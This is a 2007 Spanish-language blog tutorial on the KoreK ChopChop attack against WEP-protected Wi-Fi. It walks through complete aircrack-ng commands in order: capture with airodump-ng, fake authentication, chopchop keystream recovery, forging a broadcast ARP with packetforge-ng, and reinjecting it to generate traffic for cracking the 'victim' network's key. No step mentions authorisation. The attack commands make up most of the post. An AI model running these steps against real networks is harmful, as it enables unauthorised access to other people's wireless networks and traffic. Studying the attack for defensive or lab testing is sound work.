lunes, 24 de diciembre de 2007

Ataque KOREK ChopChop

Como una continuación del articulo anterior de ataques "no client", en el cual utilizamos el ataque arp-replay, aveces este ataque puede demorar mucho...hasta un dia o mas en capturar un arp, en estos casos es mejor utilizar el ataque ChopChop, el cual obtiene un producto cruzado(PRGA) de un paquete, para luego tomar el contenido de este y utilizarlo para crear un paqute arp, el que luego injectaremos en la red victima con el fin de generar trafico de red.

como siempre comenzaremos capturando los paquetes con el airodump, identificando el canal en el cual se encuentra la victima.

bash-3.1# airodump-ng ath0 --channel 11 -w captura

luego es necesario crear una autenticación falsa, como habiamos visto en el ejemplo anterior, esto lo hacemos:

aireplay-ng ath0 --fakeauth 20 -e KENOBII -a 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX

donde:

ath0 :interface
--fakeauth 20 :especifica el ataque y establece la peridicidad de este
-e KENOBII :ESSID, en este caso KENOBII
-a 00:11:50:XX:XX:XX :MAC de AP victima
-h 00:17:9A:XX:XX:XX :mi MAC

El comando anterior nos debe mostrar algo así
Ahora es el momento de empezar con el ataque chopchop, y esto lo hacemos utilizando la siguiente linea de comandos:

aireplay-ng ath0 --chopchop -b 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX

ath0 :interface
--chopchop :especifica el ataque
-b 00:11:50:XX:XX:XX :MAC de AP victima
-h 00:17:9A:XX:XX:XX :mi MAC

en este momento el programa comienza a leer paquetes
al encontrar un que nos sive nos preguntará, en este momento es necesario fijarnos que el Dest. MAC = FF:FF:FF:FF:FF:FF , ya que esto nos indica que es un broadcast, y esto nos servirá mas adelante
al terminar de "decriptar" el paquete nos muestra algo así:
en algunos manuales he leido que abren el archivo .xor con el tcpdump, con el fin de encontrar una ip que nos de el rango de ip que usa esta red, en este caso yo no hare eso, sinó que creare un arp directamente al broadcast.

root@darkstar:~/chopchop# packetforge-ng --arp -a 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1224-150656.xor -w pakete.cap

donde:

--arp :especifica que creara un arp
-a 00:11:50:XX:XX:XX :especifica la mac de la victima
-h 00:17:9A:XX:XX:XX :mi MAC
-k 255.255.255.255 :ip de destino...(para el caso broadcast)
-l 255.255.255.255 :ip del remitente...=broadcast
-y XXX.xor :archivo PRGA..lo obtenemos del ataque chopchop
-w pakete.cap :archivo donde guardaremos nuestro arp

ahora es el momento de mandar nuestro arp, para generar el trafico, esto lo hacemos así:

root@darkstar:~/chopchop# aireplay-ng ath0 --interactive -r pakete.cap

donde:
ath0 : interface
--interactive : ataque
-r pakete.cap : lee desde el archivo pakete.cap

esto nos mostrará lo siguiente
al enviar el paquete, podemos observar en la ventana de captura un inmenso trafico de información a alta velocidad
Esto nos permitirá, en cosa de minutos, obtener la cantidad de paquetes necesarios para poder crackear la red con aircrack, como el uso de aircrack es relativamente sencillo y ademas se encuentra en el manual anterior, dejaremos este manual asta asqui, espero les halla servido.

chop

No hay comentarios: